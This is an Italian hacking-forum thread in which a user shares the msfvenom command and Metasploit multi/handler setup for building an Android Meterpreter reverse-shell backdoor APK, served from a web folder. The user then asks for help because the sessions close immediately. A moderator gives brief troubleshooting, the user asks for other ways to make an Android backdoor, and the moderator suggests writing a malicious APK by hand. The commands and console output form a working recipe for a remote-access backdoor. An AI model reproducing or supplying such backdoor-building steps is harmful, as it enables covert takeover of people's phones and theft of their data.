Discussione Malware problema con metasploit

Iurim581

Utente Bronze
22 Giugno 2020
30
14
4
22
Ultima modifica da un moderatore:
ciao a tutti,
questi giorni sto cercando di imparare meglio metasploit, ho provato a creare una reverse shell per android con msfvenom:

Bash:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.xx LPORT=8080 R > /var/www/html/file.apk

e mi da il seguente risultato:

Ruby:
[-] No platform was selected, choosing Msf::Module:latform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10191 bytes

successivamente metto in ascolto la macchina attaccante su msfconsole:

Ruby:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOADS android/meterpreter/reverse_tcp
PAYLOADS => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.xx
LHOST => 192.168.1.xx
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.xx:8080

ed ora arriva il problema, quando avvio la backdoor dal mio dispositivo android mi da il seguente risultato:

Ruby:
[-] Command shell session 1 is not valid and will be closed
[*] 192.168.1.yy - Command shell session 1 closed.

e continua a rimanere in ascolto. Se clicco nuovamente sull'applicazione malevola (da telefono) continua a dare il resultato precedente ma con il numero di sessione diverso (1,2,3,4 ecc..).
Qualcuno che può aiutarmi?
 

0xbro

Moderatore
24 Febbraio 2017
3,956
151
2,882
1,525
ciao a tutti,
questi giorni sto cercando di imparare meglio metasploit, ho provato a creare una reverse shell per android con msfvenom:

Bash:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.xx LPORT=8080 R > /var/www/html/file.apk

e mi da il seguente risultato:

Ruby:
[-] No platform was selected, choosing Msf::Module:latform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10191 bytes

successivamente metto in ascolto la macchina attaccante su msfconsole:

Ruby:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOADS android/meterpreter/reverse_tcp
PAYLOADS => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.xx
LHOST => 192.168.1.xx
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.xx:8080

ed ora arriva il problema, quando avvio la backdoor dal mio dispositivo android mi da il seguente risultato:

Ruby:
[-] Command shell session 1 is not valid and will be closed
[*] 192.168.1.yy - Command shell session 1 closed.

e continua a rimanere in ascolto. Se clicco nuovamente sull'applicazione malevola (da telefono) continua a dare il resultato precedente ma con il numero di sessione diverso (1,2,3,4 ecc..).
Qualcuno che può aiutarmi?
Molto probabilmente il device Android taglia la sessione alla backdoor che, quindi, perde la connessione con il server
 

Iurim581

Utente Bronze
22 Giugno 2020
30
14
4
22
Molto probabilmente il device Android taglia la sessione alla backdoor che, quindi, perde la connessione con il server
ma ho provato con due device diversi sia normalmente che disattivando il play protector.
Comunque, ci sono altri metodi per poter creare una backdoor per android? Ne avrei davvero bisogno.
 

0xbro

Moderatore
24 Febbraio 2017
3,956
151
2,882
1,525
ma ho provato con due device diversi sia normalmente che disattivando il play protector.
Comunque, ci sono altri metodi per poter creare una backdoor per android? Ne avrei davvero bisogno.
Non credo, o almeno non tramite metasploit. Forse scrivendo codice a mano e creando un'APK malevola, ma tramite metasploit non che io sappia